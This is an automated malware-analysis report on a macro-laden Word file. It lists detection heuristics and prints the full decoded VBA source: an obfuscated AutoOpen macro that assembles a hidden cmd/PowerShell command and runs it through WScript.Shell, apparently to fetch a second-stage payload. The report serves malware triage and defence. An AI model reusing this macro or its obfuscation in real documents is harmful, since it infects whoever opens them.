MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros that utilize WScript.Shell to execute commands. Specifically, the script constructs and runs a PowerShell command, indicated by the 'md /v:^on ...' and 'powershell -e ...' patterns, likely to download and execute a second-stage payload. The presence of AutoOpen and Shell() calls strongly suggests malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6665581-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6665581-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + zTLkXKmtJwXBoa, 843069887 - 843069887 End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + zTLkXKmtJwXBoa, 843069887 - 843069887 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10894 bytes |
SHA-256: 261d68c2f0e16f64063ce6c1d2bc028d55e3409cf8053f1cd401e84a41535a0c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
110 of 176 identifiers look randomly generated (e.g. 'zTLkXKmtJwXBoa'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MMYbpnrz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "oGhNIGEoMzPhc"
Function wbEBOkTwF()
On Error Resume Next
iHNMbj = 46446 / wwwpVf
iHNMbj = 93358 / YhVEE - jKFCQ - BthZR
IsArray nhsYw - ArBsfn
ifOSuz = "M" + "d" + " /" + "v:^on^ " + "^ ^ " + "/r" + CStr(Chr(EXVUXjiYRToZM + oJflHUWcJUB + 34 + DALsKFcubF + wEwPJaiCfkbl)) + "s^" + "e^T"
VarType CDate(143449149)
XGdutGirnDA = " " + "^ " + " ^X^H^" + "=" + "^pow^e" + "r(0e^ll" + "^ -^e" + "^" + " ^J^:B^" + "E:H^" + "I^"
VarType CCur(XilZnu / LMbaj)
IsArray YMiWXK / TGspYZ * kUqzwu / zJiAnn
bzDSmnWj = ":^S" + "w^:" + "9:" + "G{^:Z^," + "^B3^:" + "C^" + "#" + ":bwBi^" + ":" + "^G^" + "o^:Z,"
iHNMbj = Hex(lbDzWk - finSh - PjKjG - FrsVQ)
IsArray Sqr(37376 + IVJHal - 68087 - rCEbsk)
IsArray Sin(RZmthz)
IsArray Month(Narlc)
wuBGC = "B^4^:" + "H,^:^I:" + "^" + "B.^:^GU" + "^:d"
iHNMbj = CDate(658)
IsArray CDate(369)
iHNMbj = Month(88)
zDwYTqNUNw = "^:^:/" + "^:^" + "Fq:" + "Z" + "^,Bi:" + "^E;:b^" + ":Bp:G^"
iHNMbj = Atn(75)
IsArray Second(UXVoZC)
iHmVqhAG = "U:^bgB" + "#:D(:" + "^J:^B" + "^" + "L" + ":^" + "H^Y" + "^:,g"
IsArray Log(83727 - 45846)
VarType QHiHhu * FnFlSz / 86839 + FVLSsD
VarType Sqr(tclUXh)
sqzMd = "^" + ":^9^:Cq" + "^:a^:" + "B#^:" + "H^" + ",:q:^:" + "^" + "6:C8" + "^:^L^w"
IsArray 51613 + 49369
IsArray 41833 * Dpopia
VarType Sin(69)
ztzUdYjbYS = "Bk^:" + "Gk:Z^" + "wB" + "^p:^H,^" + ":Y," + "^B(:C{" + "^:^Z,B#" + "^" + ":^G{^:^" + "Y,Bz^" + ":G8:^Z^"
VarType Oct(wUsdSK)
iHNMbj = Atn(61540 - EruNad - 16717 * fwZVYw)
VarType IBmRM / UGchY + RzzZp * dijda
VarType HCXDC * WcOdDT + COqrz - 73025
LiNmOlLjAj = "g^B^#^" + ":C^{^" + ":^Z," + "B^1:C" + "^8:Uw" + "^B:^:"
IsArray Round(32424 / GjujO)
VarType TimeValue(IiiajV)
IsArray 24606 - 10082
fdtArdNdZjl = "Gg^:" + "d:B" + "#^:H::^" + ".^" + "g^:v^:C" + "8^:^q" + "^wBv^" + ":G^;:^a" + "^,^B"
VarType CVar(MzWTnA)
VarType Month(3984)
HFbnRIPhMjZ = "v^:^G" + "^#" + ":Y,B" + "2^:^G" + "^U:^" + "bg^:" + "/^:G;^" + ":bwB^" + "t^:C" + "^" + "8:^d^"
wbEBOkTwF = ifOSuz + XGdutGirnDA + bzDSmnWj + wuBGC + zDwYTqNUNw + iHmVqhAG + sqzMd + ztzUdYjbYS + LiNmOlLjAj + fdtArdNdZjl + HFbnRIPhMjZ
IsArray Atn(45)
iHNMbj = Log(59500 * 52241 - DcKmcC - DqEtWI)
IsArray 21833 / nAPKzj
End Function
Function zZJzKY()
On Error Resume Next
VarType TypeName(FzKzp)
VarType 99994 - 78258
iHNMbj = Atn(mioVj)
VarType CVar(8)
VarType CDbl(ZIHMSJ)
iYbfU = ",^B0:G(" + ":^S" + "^g^:#^:" + "^E:^:^" + "a" + "^:" + "^B^#" + "^:H^" + ",^:q^:" + ":6^:"
VarType CrovPD + 23590
iHNMbj = 30613 - iTEAa * QOOVY * WTqhT
cwFoEaZvHDh = "C^8:" + "L" + "^wBp:H;" + ":bw^B" + "4:" + "^Gk:^Y"
iHNMbj = Second(dfRjJc)
iHNMbj = CDate(YhqwD - SklcrJ + UpoNZ * XpzNQd)
iHNMbj = CDate(87552 - zzKjK)
IsArray Round(JLzKUG)
VarType WYJnJ * IuzBG
acioUa = "^,^B(" + ":G^k^" + ":^d^:" + "B" + "^l:H" + "^" + ";^:^Lg" + "^" + "B4:G8^" + ":b^," + "^:" + "/" + ":G^{"
VarType 54961 + hwzZrm * lwuJf * 58740
VarType Atn(aSijw)
cDAXDMloG = "^:^Z^w:" + "v:^D^;:" + "^a:B;^:" + "H^g^:" + "V^,B^1:" + "G^,^:N" + "wB" + "^:^:"
iHNMbj = 98275 * wQLstc
IsArray TypeName(452)
VarType hMNMdp + XTibo * MhTpu * ilHRZq
IsArray Log(awpTR)
bJKUi = "^G" + "^g" + "^:^d:^" + "B" + "#:" + "^" + "H" + ":" + ":" + ".g:v" + "^" + ":C8" + "^:b^,B"
IsArray 70091 * VwavnV - 8266 + szXoH
iHNMbj = Second(SfjMp)
iHNMbj = 13327 * wVYij - 72184 - 18440
EzvoYzw = "v^" + ":" + "H^Y^:^" + "Z,^Bp:H" + "^;" + ":Z^wBv" + "^:^G" + ",:b^w^" + "B"
zZJzKY = iYbfU + cwFoEaZvHDh + acioUa + cDAXDMloG + bJKUi + EzvoYzw
IsArray 48950 - KisNQj + aGpKL + aJkfRi
iHNMbj = CStr(uHZBi - ZDwYVO)
VarType Xtnzk + EovAY
iHNMbj = TypeName(CvkoZ)
End Function
Function joLbP()
On Error Resume Next
IsArray Cos(5)
iHNMbj = Str(31405 - CsLLzv * 71381 * wvIRSp)
iHNMbj = 40288 + 33998
VarType Hex(2)
VarType Cos(SjEJm)
DViVP = "^p^:" + "C{:^Yw^" + "Bv:^" + "G^#:^L^" + "g^Bi^:" + "^HI^" + ":L^w^" + "B^Z^" + ":H^I^:R"
iHNMbj = CStr(2814)
DzTTT = "^,:^z:D" + "^" + "I^" + ":Vw" + "^BN^" + ":^E^,^:" + "^" + ",:" + "B"
iHNMbj = Sgn(358)
VarType TypeName(633)
IsArray 80382 / Hwbha
wadHL = "^o^:H^" + ",^:^d:^" + "B^w^:" + "^D^o^:L" + "^w" + "^:v^:" + "^G^{:" + "a,B2:G" + "^E:qwBp" + ":" + "C^{^:"
iHNMbj = Val(4)
VarType CByte(53)
kHRjnq = "a^,B/:" + "C^8^:Uw" + ":^`:C" + "{:^Uw" + "B^" + "w:^Gw" + ":^a^,^" + "B^#:" + "Cg^" + ":^" + "Jw^B" + ":^:C" + "q^:^K"
iHNMbj = dObNzo * FCkjHC - FLCrjW / HiBUq
RiEjupYs = ",^:^7" + ":C" + ",:Z" + "^gB3" + ":H^o:^" + "I^:^:"
iHNMbj = CDate(7315)
iiMCLUSszdr = "9:C:^:^" + "Jw:^{^" + ":^D^U:." + ",:^`^" + ":^D(:" + "J:B^I:" + "E{^" + ":q^:" + ":9:C,^" + ":^Z,B/" + ":H"
VarType Sqr(jFwYYv)
iHNMbj = Log(579)
lHITPMr = "Y:^.^gB" + "^w^:" + "H^U:" + "Y^gB(:" + "Gk"
IsArray RmcapZ * VEszi * 6615 / WfatJ
IsArray Sqr(2)
iHNMbj = Str(623)
VarType Round(33403 / ftsYzc)
GwaCl = ":^Yw:r^" + ":Cq" + ":^X^" + ":^" + ":^`:C(" + ":" + "^J:^" + "Bm:H^q^" + ":^eg:r:" + "Cq" + ":LgB"
joLbP = DViVP + DzTTT + wadHL + kHRjnq + RiEjupYs + iiMCLUSszdr + lHITPMr + GwaCl
IsArray iIUGb / 59804 + 31980 * oBftF
IsArray TimeValue(ihRcd)
VarType Val(lOcUA)
iHNMbj = 93605 * swCzuW
End Function
Function PZiIj()
On Error Resume Next
VarType Val(98225 - sddzA * nsAAo - 78027)
SXPjvZbo = "^" + "l:H" + "^g:^Z^," + "^:`" + ":^" + "D" + "(^:" + "Zg" + "Bv^:HI" + "^:^Z,^" + "B0^" + ":" + "G;:^a^:"
IsArray CCur(535)
VarType qMXtN - YAktid
PYWHFroKw = "^:o:C," + ":" + "V^gB^3^" + ":G^g:I" + "^" + ":B" + "p^:G{^:"
IsArray huZcc + chdPIJ - 80212 / FAEEc
iHNMbj = Round(48)
VarType LCase(zoGQt)
GvORZGk = "I" + "^::^k^" + ":E(" + "^:d" + "^gBC:Ck" + "^:^ewB#" + "^:^H"
iHNMbj = oLwCHM * 1850 * 26068 + njRto
iHNMbj = CDate(962)
VarType hDbVp * dvSWF
wzocGwdfHPt = "I^:e,^" + "B^7^:C" + "^,^" + ":" + "R^:^B^" + "$:E(" + "^:L" + "^g^" + "BE" + ":^G8^:^" + "d^w"
IsArray ZUuAtL / zFmcJ
IsArray Rnd(GAMlr - BcnRA)
iHNMbj = mkLHLs * aFuUw / QrEwbb + BPEdNw
DWDsNkSIYG = "B" + "/:^Gw^:" + "bw" + "B0" + "^"
PZiIj = SXPjvZbo + PYWHFroKw + GvORZGk + wzocGwdfHPt + DWDsNkSIYG
iHNMbj = Log(9)
End Function
Function lhHCia()
On Error Resume Next
iHNMbj = CBool(oWfitP)
VarType Sin(24)
IsArray CStr(MHJXrq)
ZTdlqhQI = ":G^" + ",:R^g" + "Bp^" + ":^Gw^" + ":Z^," + ":o^:C" + "^" + ",:V^gB"
VarType 85274 + 84181
IsArray 70477 + lBcEcJ - dUXsM / pqQFX
iHNMbj = Val(830 * ATCTQs)
IsArray 18895 * RjKOzm
GWOCD = "3^:Gg^:" + "^L::g" + "^:" + "C,^" + ":^" + "S:B^.^:" + "H^::K" + "^,:" + "^7" + ":^E^"
iHNMbj = CStr(59257 + rIIft)
iHNMbj = Sqr(szQDt - KKlhi / 73397 - HVMiWn)
VarType Log(rUobX)
VarType qGDiIj / ViZcwI
iHNMbj = 84390 * zmYbRm * rTzuO * snUcvN
boYhTUQV = "k^:^b" + "gB2" + ":^G8" + "^:a^w^" + "B^l:" + "C#:^S" + "^,^B#" + "^:G" + "U^:b^,^" + ":" + "g:C" + "^,^:S^:"
IsArray Second(2384)
IsArray CDec(4009)
IsArray Str(67831 / AzppD)
IsArray 70021 - tEiibp - itzibf / KbthKC
VarType 78399 + tFWvaJ / 12006 / nIzWzK
TjSPiDZHXC = "B.^" + ":H:^:." + "wB^i^:" + "^HI:Z," + "^" + "B0:^G" + "(:^.w" + "B9" + ":" + "^"
IsArray 90172 * YHiFFH + ZFtLZm + uTiIK
iHNMbj = CDec(zoBuz)
jGiKtziiDru = "G;:Y^" + ",^B^" + "#^" + ":G" + ";:"
IsArray LCase(FAzAZ)
iHNMbj = Sin(ChIMH - OdhaT)
VarType CVar(881)
IsArray Int(61670 + BOMRj + 49941 / RrVJdc)
KQZLmjqDSo = "a:B^7^:" + "^H" + "#:" + "^f" + "^" + ",:g:C:" + "^:I" + "::^g:" + "C^:^:^" + "I::g" + "^:C^:"
iHNMbj = TypeName(Rhvhf + GTqJb)
iHNMbj = Rnd(MYpnkf * NtjLrV / 17388 * wfPcs)
IsArray 21136 * pNtqr - wCTMM * 39779
iHNMbj = Int(519)
dlwaYoiwNpF = ":" + "^I^:^:" + "g" + ":" + "C::I^:" + "^:^g^:C"
IsArray IsCzk - ZpBQC
IsArray qVauz / AKjba
iHNMbj = TypeName(30124 / jFTjm)
FQsXbiSPqzr = ":^:I" + "::g^:C^" + "::" + "& " + " s^e^" + "T ^ " + "^H^q=!^" + "XH^:^q=" + "c!&&S"
VarType CVar(77)
IsArray 75143 / pujsui
IsArray Kohuu + GAUGm
iHNMbj = Oct(21)
fnqCJ = "^" + "E^T " + " ^" + "43^G=^" + "!^H^q^:" + "^0^=h" + "!&&"
lhHCia = ZTdlqhQI + GWOCD + boYhTUQV + TjSPiDZHXC + jGiKtziiDru + KQZLmjqDSo + dlwaYoiwNpF + FQsXbiSPqzr + fnqCJ
IsArray CCur(2)
iHNMbj = aViLYX / 24379 + WRmmr + AHYwNu
End Function
Function BzEQV()
On Error Resume Next
iHNMbj = CDbl(517)
bTiIpknZQjF = " s^E" + "t ^ ^" + " " + "^ k^eP" + "Y=^!^4^" + "3^" + "G" + "^"
iHNMbj = Str(WcIYh - mhAsl)
VarType Fix(9079)
AiIYaTZwDTc = ":`" + "^=n^!&&" + " " + " s^e" + "^T ^L" + "^G0=!^k" + "^e" + "^" + "P^Y" + "^:$=^"
iHNMbj = Fix(7)
iHNMbj = Str(iQTDIo)
cCcIfS = "y" + "!&" + "& se" + "^t ^" + " ^" + " ^7M1" + "^S=" + "^!^" + "L^G" + "0^:^4^" + "=^j!& " + " "
iHNMbj = FbhSin - SpBuE
iHNMbj = 79213 / zEqjOk - 29954 * zQjWk
HaTrOa = " " + " S^E^" + "t ^ c^" + "KmC=^!" + "^7M" + "^1^S" + ":(^=s!"
VarType Rnd(MOzbpE * WEVES)
iHNMbj = CStr(azbTD)
mDDhMav = "&s^E^T " + "^" + " " + "^ v^B" + "^6" + "^a=" + "!c^K^" + "mC^"
VarType 82032 * lkKOJ
VarType fqpNiC * RfJcTi / nNJupU - 59728
iHNMbj = 62792 * jfpjuQ + JkfjH + cVLYnp
QPfwcbzO = ":^," + "=^Q" + "^!&&s^" + "Et ^ ^" + " ^ " + "A" + "^" + "j^p=!v^"
IsArray Hex(BlJshD + 24796 + 28734 - OESjD)
vfWaB = "B^6^" + "a:." + "=^O^!&" + "& " + " s"
IsArray Log(52058 * ZdwrDl)
LYjPHGEI = "^eT " + "^ ^ " + "Vn=^!^A" + "^j^" + "p^" + ":" + "^:^=^A" + "!&se^" + "t ^ " + "^ ^Y" + "^a=!V" + "n:^#^=" + "^0"
VarType ncjkfK - XmOJHq
iHNMbj = ztuSzJ / aqYdh
VarType Second(4)
iHNMbj = 10726 * jGwvH
VarType Fix(IWcaJ)
MMvmN = "!&&" + " SE^T" + " NCt=^!" + "^Y^" + "a:^{^" + "=^4" + "^!&& " + " SE" + "^T ^gn" + "0^9=^!N" + "C^t:/" + "^=^u!& " + " s^"
iHNMbj = Second(3212)
IsArray CCur(Ginadv + pMbvsi + LbSPZ / jIrTZ)
VarType BAGUvF - 79299 * FrjEcF - wfuzd
qQQMSGVrX = "e" + "t" + " ^ ^" + " ^EH" + "=^!" + "^gn^" + "0^" + "9^" + ":;^=" + "^M^!" + "&C^" + "A^L^"
VarType uIbGz * 75244
iHNMbj = Oct(KMfoF)
dorLEk = "l %^EH%" + " " + " " + CStr(Chr(UhvLzWYJU + wOHTjMDD + 34 + QZMAuTIt + ZWwkvwQFFL)) + " "
BzEQV = bTiIpknZQjF + AiIYaTZwDTc + cCcIfS + HaTrOa + mDDhMav + QPfwcbzO + vfWaB + LYjPHGEI + MMvmN + qQQMSGVrX + dorLEk
VarType Hex(79)
iHNMbj = CStr(pjGjiK)
End Function
Attribute VB_Name = "VndRBbniaq"
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 3 + 9 + 3 + 50) + ztXZmEVS + hzGljvbXiwb + wbEBOkTwF + zZJzKY + joLbP + PZiIj + lhHCia + BzEQV + vSQMiWUrR + zTLkXKmtJwXBoa, 843069887 - 843069887
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.